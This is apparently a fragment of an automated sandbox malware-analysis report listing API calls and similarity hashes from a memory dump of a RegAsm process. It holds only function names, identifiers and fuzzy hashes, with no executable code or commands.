            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocString
            • String ID:
            • API String ID: 2525500382-0
            • Opcode ID: 010599ace64afa0fd931332d4eff0e53072c5c377267fce42cf799148445ea3e
            • Instruction ID: 1012845b982b314312a11b76a9515d813b78d57e7130b6e5c59d80d9745d83a5
            • Opcode Fuzzy Hash: 010599ace64afa0fd931332d4eff0e53072c5c377267fce42cf799148445ea3e
            • Instruction Fuzzy Hash: 4101A2B4559342CFD364DF28C598B5ABBE1FB88308F11892DE98987390D774A948CF82
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004375B6
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID:
            • API String ID: 2039140958-0
            • Opcode ID: f75bdd7997d0d702300b3c81595aba1a0e148012e40e8d5f57b0db497b5941a0
            • Instruction ID: 25be8be8643b543278f2c9df8cfb857663b0fb7502629115cf4a59818b19cadd
            • Opcode Fuzzy Hash: f75bdd7997d0d702300b3c81595aba1a0e148012e40e8d5f57b0db497b5941a0
            • Instruction Fuzzy Hash: 50F065357C93C07FD71647307C62F413B648B43A44F1D04ABBA52E90D3D468752DD629
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Clipboard$CloseDataInfoOpenWindow
            • String ID: 7$8$9$:$;
            • API String ID: 2278096442-1017836374
            • Opcode ID: 042562e823fc24998125cc5bb4d4d05e72d82f571992b3f7019f57a304604d57
            • Instruction ID: cc50d103229a6a5400ae63f8ccf3d1ebe4fc1d34d1c814e7605de7f3cfd710c1
            • Opcode Fuzzy Hash: 042562e823fc24998125cc5bb4d4d05e72d82f571992b3f7019f57a304604d57
            • Instruction Fuzzy Hash: A471BFB4508740DFC321DF28C495726BBE0AF4A314F149B5AE8968B756C338E846DF6B
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Object$DeleteMetricsSelectSystem
            • String ID:
            • API String ID: 3911056724-3916222277
            • Opcode ID: a5a42883c6a7052007b696ac13c6824caf2bf1d960b2fd5b81c52589d8d48e99
            • Instruction ID: 078b64a4054221a8f4ece22bdc7f99f4f2cd159220ebdc0681bb7c8f1abce6b1
            • Opcode Fuzzy Hash: a5a42883c6a7052007b696ac13c6824caf2bf1d960b2fd5b81c52589d8d48e99
            • Instruction Fuzzy Hash: CE919BB8904B009FD764EF29DA85B16BBF0FB4A300F50492DE99A8B760D731A845CF52
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000D,?,00000008,?), ref: 004373DE
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings
            • String ID: HbD
            • API String ID: 237503144-2813495750
            • Opcode ID: 80daee74cf1f8a8c4f64ed36e56172b1866fdf3375e2ebd1f8dd06d2f6920f19
            • Instruction ID: 41d28e73fb5ba7aa71ad924c4cbbb1757781dc30d8bd9ce711ff6f17377026f7
            • Opcode Fuzzy Hash: 80daee74cf1f8a8c4f64ed36e56172b1866fdf3375e2ebd1f8dd06d2f6920f19
            • Instruction Fuzzy Hash: 7A515CB55007019FD328CF29C545616BBF1FB49314F158A6DE8AA8B781D338E886CBD5
            Uniqueness

            Uniqueness Score: -1.00%